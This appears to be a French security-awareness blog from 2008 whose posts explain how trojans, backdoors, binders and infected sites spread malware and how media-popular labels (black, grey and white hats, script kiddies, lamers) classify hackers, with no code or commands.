L'usage du Cheval de Troie ou Trojan pour installer un parasite est la méthode la plus répandue et c'est vous-même qui êtes allé chercher le vecteur (probablement un programme "gratuit" ou "freeware" ou "shareware") de l'infection et avez procédé à son rapatriement (téléchargé ou copié depuis un CD-ROM etc. ...) et à son installation. Par exemple, c'est vous-même qui installez KaZaA sur votre ordinateur : KaZaA ne vient pas tout seul s'installer. Mais KaZaA est le vecteur de très nombreux parasites dont un downloader permettant d'installer encore d'autres parasites dans un système pyramidal. C'est un Trojan. Cette nécessité d'installer le trojan pour que soient installées les parasites contenus est importante car elle dénote bien qu'un trojan doit être installé pour pouvoir lâcher sa charge active. Il y a donc une faille des mesures et procédures de sécurité et elles sont inefficaces ou l'agresseur possède une complicité à l'intérieur.

L'ouverture d'un courrier piégé :

Spam ou non, vous ne devez jamais ouvrir un courrier dont vous ne connaissez pas l'expéditeur et vous ne devez jamais cliquer sur un lien dans un courrier, spam ou non. Un tel courrier piégé peut être assimilé à un cheval de Troie. Vous devez être équipé d'un anti-spam et d'un antivirus.

Usage d'un Fake ou Hoax :

Il s'agit de faux ayant l'apparence du vrai. On les trouve surtout sur les réseaux de P2P où les parasites portent, simplement, le nom des programmes les plus convoités (un jeu...), des chansons les plus téléchargées etc. ... et dans le courrier électronique (spam ou non). Le phishing est de cette nature.

Usage d'une faille de sécurité :

Cas plus rares, le parasite est installé automatiquement depuis Internet, en exploitant des failles de sécurité. Techniques plus complexes comme le buffer-overflow et avec l'aide d'un downloader... Une technique consiste, par exemple, pour attaquer un système bien protégé, à utiliser un sniffer sur une liaison entre cet ordinateur et un ordinateur externe moins bien protégé auquel le premier fait appel régulièrement (par exemple transmissions quotidiennes depuis une filiale vers une maison mère). Le sniffer permet de repérer, dans les en-têtes, l'identité et le type des fichiers transmis régulièrement. Il suffit alors de faire passer le parasite pour l'un de ces fichiers sur la machine faillible pour infester la machine cible.

Usage de sites piégés :

Les sites piégés malsains que vous visitez installent "à l'insu de votre plein gré", grâce à l'usage de contrôles ActiveX ou de langages de script, des parasites de toutes nature. Ils profitent d'un certain laxisme de votre part dans le réglage de votre navigateur (surtout Internet Explorer) en ce qui concerne l'acceptation des ActiveX et des scripts. L'un des pièges pour conduire les scripts est l'usage d'images piégées dont les fameuses images invisibles, les WebBugs.

Usage d'un binder :

Le parasite est saucissonné (découpé) en un tas de petits bouts, chacun étant suffisamment anodin pour être indétectable. Le Binder va assembler et créer le parasite à partir de petits bouts à l'apparence anodine. Le problème, en amont, est que le binder et les petits bouts du parasite ont pénétré le système. Il y a donc, également, une faille de sécurité à chercher.

Le Backdoor

2008-11-03T09:39:00.000-08:00

Le Backdoor

Définition : outil de pirate créant une faille de sécurité en maintenant ouvert un port de communication.

Description : Un Backdoor est une petite tâche chargée de maintenir un port ouvert afin de permettre, dans un second temps, quelquefois plusieurs mois plus tard (ou jamais), d'attaquer une machine. Le backdoor est diffusé par les mêmes voies que les virus afin d'infester un maximum de machines. Il va ensuite s'arranger pour être lancé automatiquement à chaque démarrage de la machine infestée puis va maintenir un port ouvert dès qu'il y a connexion.

Certains s'attaquent à des cannaux de communications particuliers comme IRC... Il va en rester là car son action se limite à cela. Il a préparé une attaque future. L'attaque, elle, se fera en 2 temps :

L'attaquant utilisera d'abord un scanner d'adresses IPs et de ports pour chercher, sur Internet, une machine (une adresse IP parmi un intervalle d'adresses IPs) dont un port est maintenu ouvert par son backdoor, puis il effectuera une tentative d'exploit (exploitation d'une faille de sécurité) ou autre forme d'attaque préparée par le backdoor. Le backdoor n'est donc pas réellement une malveillance. Il la précède. Il se pose donc 2 problèmes, tous les deux de nature "faille de sécurité" :

Le maintien ouvert d'un port qui est, en lui-même, une faille de sécurité.

La faille de sécurité préalable qui à permis l'implantation de ce backdoor.

Nota : plusieurs RATs (Remote Administration Tools) portent, dans leur nom, le terme de "Backdoor", ce qui prête à confusion, les RATs n'étant pas des Backdoors, les Backdoors n'étant pas des RATs et les Trojans (chevaux de Troie) n'étant ni les uns ni les autres.

Nota : plusieurs attaquant peuvent "tomber" sur ce port ouvert et pas seulement celui qui à diffusé le backdoor. Pareillement un attaquant peut "tomber" sur le backdoor d'un autre pirate.

Nota : certains backdoors sont un peu plus "complets" et contiennent un downloader et/ou un installeur.

Fichiers à risque

2008-11-03T09:17:00.000-08:00

Voici les types de fichiers dont il faut se méfier

Tous les fichiers (dont ceux attachés à un e-mail) se terminant par un suffixe sité ci-dessous sont succeptibles d'être une malveillance ou un trojan contenant une malveillance.

Le Trojan

2008-11-03T06:17:00.000-08:00

Trojans

Définition : Un trojan, ou Cheval de Troie

C'est un programme utilisé comme véhicule pour introduire dans un dispositif un ou plusieurs autres programmes, généralement des parasites, cachés à l'intérieur du premier.

Cette dichotomie complète entre le support et l'infection caractérise les chevaux de Troie.

Un troisième laron est utilisé pour lier le véhicule et sa charge utile (payload) en un tout installable et mono-fichier : un Binder. Le binder permet de lier les deux premiers et permet également de les délier (de lâcher la charge utile - fonction de Dropper ) lors de l'installation du véhicule.

Description des Trojans : C'est un programme ayant deux caractéristiques :

Un comportement apparent utile (mais souvent futile, comme les économiseurs d'écrans, qui sont presque tous des trojans) à l'utilisateur de l'ordinateur (c'est le porteur, le vecteur, le véhicule, la méthode d'infestation, la partie visible du cheval que les grecs exhibèrent devant Troie).

Un comportement caché, malveillant, dû à l'implant véhiculé à l'intérieur du trojan (la charge utile, "Payload"), conduisant à la destruction ou la divulgation des données ou à l'ouverture d'une porte dans le système de communication et à l'espionnage ou à la publicité etc. ... (c'est la cohorte des grecs sortant en cachette du cheval pour ouvrir les portes de Troie et permettre au reste de l'armée grecque d'entrer et totalement détruire Troie).

On peut distinguer :

Les trojans conservant leur charge utile sur eux, en plus de leur activité apparante. Le nom de "trojan" est attribué, par abus de langage, à l'ensemble des deux ce qui conduit à une grande confusion. Ce type de cheval de Troie ne devrait être classifié qu'à la classe de malveillances qu'il embarque, par exemple à Keylogger ou à Backdoors...
Les trojans lâchant leur charge utile. Les deux poursuivent leurs activités séparemment. Si le trojan est désinstallé, la charge utile (le parasite) poursuit son travail et inversement. Ce type de trojans est à juste titre classé à "trojan" et la charge utile lâchée est classée au nom de sa classe de parasites.

Les trojans qui n'ont pas d'autre activité (pas d'activité apparente) que de lâcher et installer un parasite. Ce type de trojans est classé à "Dropper" et la charge utile lachée est classée au nom de sa classe d'implants malveillants, généralement un virus.
Les types de fichiers dont il faut se méfier :Tous les fichiers (dont ceux attachés à un e-mail) se terminant par un des suffixes cité ici sont succeptibles d'être une malveillance ou un trojan contenant une malveillance.

Classement des Pirates

2008-11-01T05:40:00.000-07:00

Définition générale

Un pirate, en informatique, est une personne pénétrant sans autorisation un objet informatique par un moyen informatique. Aussi anodin que puisse paraître l'acte, il s'agit en droit français d'un délit ou d'un crime dont l'objet et / ou l'acte sont informatiques. L'acte en lui-même est un acte de piraterie, l'action est une action de piratage, l'acteur est un pirate.Divers classements stratifient les pirates :Il y a pirates et pirates et ils tiennent à ces distinguo. Tout un vocabulaire les classe, les hiérarchise... Ils y a ceux qui cherchent les failles pour les signaler aux directeurs informatiques, ceux qui les recherchent pour les exploiter, ceux qui pénètre pour l'exploit seulement et s'en vont en laissant juste une micro preuve pour leurs archives mais sans rien casser, ceux qui détruisent tout sur leur passage...

Votre pirate est l'un de ceux-là :

Hacker :

Hackers - Bidouilleur - Fouineur. Acception "légale" du terme : passionné(e) d'informatique. Acception "illégale" du terme : pirate informatique. Un hacker est, à l'origine du terme, un étudiant particulièrement inventif au MIT (Massachusetts Institute of Technology - prestigieuse université et institution de recherches américaine en science et technologies située à Cambridge (Massachusetts) et leader mondial dans l'enseignement et la recherche en ces matières). Le hacking consiste alors à faire faire à une machine autre chose que ce pour quoi elle a été pensée au départ. L'aspect ludique de cette domination de la machine et la passion des plus brillants et audacieux a donné naissance aux premiers hackers en informatique, toujours au sein du MIT (par exemple, développer un jeu sur un ordinateur - le premier, d'une complexité inouïe à l'époque, étant de simplement faire se déplacer un spot sur un écran à partir d'une manette qui le commande (qu'il a fallu inventer également)).Aujourd'hui, le terme de hacker désigne toujours un informaticien brillant, capable de pénétrer profondément dans le cœur d'un système d'exploitation, d'un gestionnaire de réseau, d'une application... pour chercher la petite bête, la faille, le truc pas encore vu, pas encore exploité etc. ...Les hackers se divisent, selon une catégorisation popularisée par les médias, en :

Black Hats (chapeaux noirs)Hackers exploitant leurs trouvailles à des fins hostiles, parasitaires, maffieuses, terroristes... Ce sont les Pirates.

Grey Hats (chapeaux gris)Hackers exploitant leurs trouvailles à des fins de preuves et de démonstrations (pénétrations réelles dans des systèmes etc. ... sans nuisance). Motivés par le jugement porté sur eux par les autres hackers, ils communiquent leurs prouesses afin de se faire valoir mais ne dégradent rien, ne compromettent rien, ne divulguent rien des données auxquelles ils auraient pu accéder

White Hats (chapeaux blancs)Hackers travaillant à la sécurisation des systèmes, par exemple en communiquant aux éditeurs leurs trouvailles et en leur laissant le temps de les corriger avant de rendre publics leurs travaux. On trouve parmi eux des consultants en sécurité informatique, des policiers spécialisés contre le cyber-terrorisme etc. ...

Script Kiddies :

Nom péjoratif donnés aux gamins apprentis pirates, totalement immatures et sans aucune intelligence, seulement capables de pomper un script hostile tout fait (et disponible sur le Net), d'en modifier sommairement un truc ou deux et de s'en servir (ou le lâcher sur le Net s'il s'agit d'un parasite).

Gamins un peu férus d'informatique et qui tâtent au fruit défendu. Apprentis pirates, ils sont souvent ceux qui font le plus de dégâts, juste pour le "fun" ou pour se faire la main avant de s'attaquer à de plus gros morceaux.

Généralement animé de la seule intention de se faire remarquer dans le millieu très fermé des "grands" hackers, ou simplement pour le plaisir car c'est l'âge des boutons et des bêtises, ils lancent des attaques très violentes et destructrices afin de faire parler d'eux et sont, en ce sens, très dangereux.

Lamer :

Le Lamer (prononcez lameur) est un pirate, comme les hackers, mais, à la différence d'eux, il est imbécile (ou jeune boutonneux complètement débutant). Incapable de faire quoi que ce soit par lui-même, il collectionne les hack et crack développés par de vrais hackers, qu'il trouve sur le Net, pour les exploiter. Il les utilise, généralement, sans rien y comprendre, juste pour voir ce que cela fait. Ne sachant pas s'en servir, les lamers sont très dangereux car leurs maladresses se traduisent parfois par la destruction des systèmes visités.

Le Lamer est encore plus bas, dans la hiérarchie des pirates, que le Script kiddies. Il est franchement de bas niveau et le terme de "lamer" est particulièrement péjoratif.